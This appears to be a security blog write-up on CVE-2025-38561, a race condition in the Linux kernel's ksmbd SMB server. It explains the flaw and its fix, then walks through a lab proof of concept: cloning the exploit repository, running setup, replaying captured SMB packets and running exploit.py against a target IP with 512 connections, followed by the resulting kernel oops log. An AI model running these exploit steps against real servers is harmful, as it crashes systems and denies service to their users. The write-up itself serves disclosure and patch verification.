CVE-2025-38561 is a race condition vulnerability that was identified in Linux Kernel's ksmbd (in-kernel SMB server) component with a CVSS3.1 base score of 8.1. It was discovered on August 19, 2025 and disclosed publicly on September 24, 2025.
The flaw lies in the handling of sess->Preauth_HashValue during the SMB2 session setup request. Since there is no synchronization around freeing or modifying this memory during setup, concurrent session setup requests can lead to a race condition (one thread might free or reallocate the memory while another is still accessing it).
This means, an attacker who can issue multiple simultaneous session setup requests (after authentication) can exploit this race condition to corrupt kernel memory and potentially, achieve arbitrary code execution.
Any Linux kernel that includes the in-kernel SMB server ksmbd and does not contain upstream fix from git commit 44a3059c4c8cc635a1fb2afd692d0730ca1ba4b6 is affected.
The upstream fix for this vulnerability was committed in git commit 44a3059c4c8cc635a1fb2afd692d0730ca1ba4b6 (ksmbd: fix Preauth_HashValue race condition)and has been back-ported into several stable kernel trees. Many distributions have already released, or will soon release patched kernel packages.
On Debian-based systems, you can verify whether your kernel includes the patch by checking the package changelog:
apt changelog linux-image-$(uname -r) | grep ksmbd
The only mitigation is to upgrade to a patched version as early as possible.
In the section below, I will be discussing the minimal PoC (Proof of Concept) for CVE-2025-38561 that can be found here.
As of October 9, 2025, Debian 11, 12 and 13 have been patched. Ubuntu distros are vulnerable to the said CVE. Naturally, we used - Ubuntu 22.04 for its vulnerable kernel and Debian 13 for its patched kernel to compare results.
Since it is a kernel vulnerability, 2 Virtual Machine instances with the following configurations were used:
Ubuntu server and Debian minimal installation were used.
All set, let us get to the PoC. We begin by cloning the git repository on the instance and navigating into the cloned directory.
git clone https://github.com/toshithh/CVE-2025-38561
cd CVE-2025-38561
Before proceeding further, we need to escalate ourselves to root. On Debian, it can be done using
su root
and on Ubuntu,
sudo su
The folder contains a setup.sh file. This file installs the required packages, loads the ksmbd kernel module and enables guest access to the SMB server. To set up,
chmod +x setup.sh
./setup.sh
To verify if the ksmbd server works, we can try listing the shares using smbclient or just check if port 445 is enabled using netstat.
smbclient -L //localhost/ -N
#OR
netstat -tulnp | grep 445
There are two binary files - negotiate.bin and session_setup.bin in this directory, which are actually SMB packets captured through wireshark. These were used because otherwise, the ksmbd implements a strict check on the packet and discards the packets which do not match its criterion.
To capture these packets,
wireshark session on your host machine and monitor the network traffic.smbclient.wireshark session usingsmbclient -L //192.168.0.132/ -N
Then find the negotiation request and session setup requests and export there packets as depicted below.
With the basic setup complete, execute exploit.py specifying the target IP and number of concurrent connections to use to achieve the race condition. The vulnerable server gets stuck while the patched server just drops the broken connections.
python3 exploit.py 192.168.0.132 512
The screenshot below shows the difference between the execution of the exploit on a vulnerable vs a patched server.
The vulnerable server reaches the race condition quickly due to incomplete session setup requests and all connections get stuck while the patched server treats and discards them according to the synchronized mechanism.
The time for execution on both the instances confirms it. Although both the instances have the same configuration, the vulnerable instance quickly reaches race condition and there is a denial of service instantly within a minute. On the patched instance, the server discards the sess->Preauth_HashValue in the end and there is proper synchronization. Hence, it takes 11 minutes to complete all requests (due to exhaustion of resources)!
Finally, on the vulnerable server, check the kernel logs with dmesg and look for a kernel oops. It should look like the example below.
dmesg | tail -60
[33719.045396] ksmbd: NTLMSSP SecurityBufferLength 188
[33719.045676] ksmbd: connect success: accepted new connection
[33719.045698] ksmbd: RFC1002 header 264 bytes
[33719.047116] Unable to handle kernel paging request at virtual address ffff06b1ab079a00
[33719.047426] Mem abort info:
[33719.047532] ESR = 0x0000000096000004
[33719.047682] EC = 0x25: DABT (current EL), IL = 32 bits
[33719.047882] SET = 0, FnV = 0
[33719.047997] EA = 0, S1PTW = 0
[33719.048116] FSC = 0x04: level 0 translation fault
[33719.048299] Data abort info:
[33719.048408] ISV = 0, ISS = 0x00000004
[33719.048552] CM = 0, WnR = 0
[33719.048665] swapper pgtable: 4k pages, 48-bit VAs, pgdp=000000004a6fa000
[33719.048940] [ffff06b1ab079a00] pgd=0000000000000000, p4d=0000000000000000
[33719.049264] Internal error: Oops: 0000000096000004 [#2] SMP
[33719.049512] Modules linked in: nls_utf8 tcp_diag udp_diag inet_diag ksmbd crc32_generic rdma_cm iw_cm ib_cm ib_core cifs_arc4 tls binfmt_misc nls_iso8859_1 snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_intel_dspcfg input_leds joydev snd_hda_codec snd_hda_core snd_hwdep snd_pcm qemu_fw_cfg snd_timer snd soundcore sch_fq_codel dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua efi_pstore ip_tables x_tables autofs4 btrfs blake2b_generic zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor xor_neon hid_generic usbhid hid raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_ce ghash_ce sha3_ce sha3_generic sha512_ce sha512_arm64 virtio_gpu virtio_dma_buf sha2_ce drm_kms_helper sha256_arm64 sha1_ce syscopyarea sysfillrect sysimgblt fb_sys_fops virtio_rng cec rc_core drm virtio_blk virtio_net xhci_pci net_failover xhci_pci_renesas failover aes_neon_bs aes_neon_blk aes_ce_blk crypto_simd cryptd aes_ce_cipher
[33719.053911] CPU: 3 PID: 2 Comm: kthreadd Tainted: G D 5.15.0-119-generic #129-Ubuntu
[33719.054307] Hardware name: QEMU QEMU Virtual Machine, BIOS 0.0.0 02/06/2015
[33719.054709] pstate: 40400005 (nZcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[33719.055003] pc : percpu_ref_get_many+0x2c/0x80
[33719.055243] lr : refill_obj_stock+0x78/0x170
[33719.055425] sp : ffff800008033280
[33719.055565] x29: ffff800008033280 x28: ffff63618e730e00 x27: ffff6361846c75b0
[33719.055866] x26: ffff6361846c75b0 x25: ffffc011a52d8000 x24: fffffd8d8611b1c0
[33719.056167] x23: ffff63619453f468 x22: 0000000000000000 x21: 0000000000000070
[33719.056467] x20: 0000000000000001 x19: 0000000000000001 x18: 0000000000000000
[33719.056768] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
[33719.057068] x14: ffffc011a4eabf30 x13: ffff800008000000 x12: 0000000000000000
[33719.057368] x11: 0000000000000004 x10: 0000000000000003 x9 : ffffc011a2a20bc0
[33719.057668] x8 : 0000000000000238 x7 : 0000000000000013 x6 : ffff636181c550a8
[33719.057968] x5 : 0000000000000006 x4 : 0000000000000001 x3 : 0000000000000000
[33719.058268] x2 : ffff63619453f468 x1 : ffffa3501b711000 x0 : ffff06b1ab079a00
[33719.058664] Call trace:
[33719.058777] percpu_ref_get_many+0x2c/0x80
[33719.058952] refill_obj_stock+0x78/0x170
[33719.059118] obj_cgroup_uncharge+0x1c/0x2c
[33719.059292] kmem_cache_free+0x2f8/0x454
[33719.059458] free_buffer_head+0x30/0x60
[33719.059645] try_to_free_buffers+0xd8/0x18c
[33719.059821] jbd2_journal_try_to_free_buffers+0xe0/0x1c0
[33719.060069] ext4_releasepage+0x54/0xb4
[33719.060244] try_to_release_page+0x6c/0xac
[33719.060444] shrink_page_list+0xba0/0xf60
[33719.060613] shrink_inactive_list+0x16c/0x54c
[33719.060796] shrink_lruvec+0x2cc/0x3c0
[33719.060954] shrink_node_memcgs+0x1c0/0x230
[33719.061130] shrink_node+0x164/0x6f0
[33719.061281] do_try_to_free_pages+0xf4/0x530
[33719.061460] try_to_free_pages+0x114/0x210
[33719.061633] __alloc_pages_slowpath.constprop.0+0x354/0x82c
[33719.061882] __alloc_pages+0x2a4/0x310
[33719.062075] alloc_pages+0x9c/0x19c
[33719.062222] __vmalloc_area_node.constprop.0+0x22c/0x354
[33719.062446] __vmalloc_node_range+0x7c/0x11c
[33719.062720] alloc_thread_stack_node+0x11c/0x1f0
[33719.062949] dup_task_struct+0x5c/0x2d0
[33719.063112] copy_process+0x1ec/0x12a0
[33719.063272] kernel_clone+0x94/0x4ac
[33719.063424] kernel_thread+0x74/0xa4
[33719.063576] kthreadd+0x164/0x320
[33719.063737] ret_from_fork+0x10/0x20
[33719.063921] Code: f240041f 54000181 d538d081 8b010000 (f833001f)
[33719.064196] ---[ end trace a874643b7b9fc499 ]---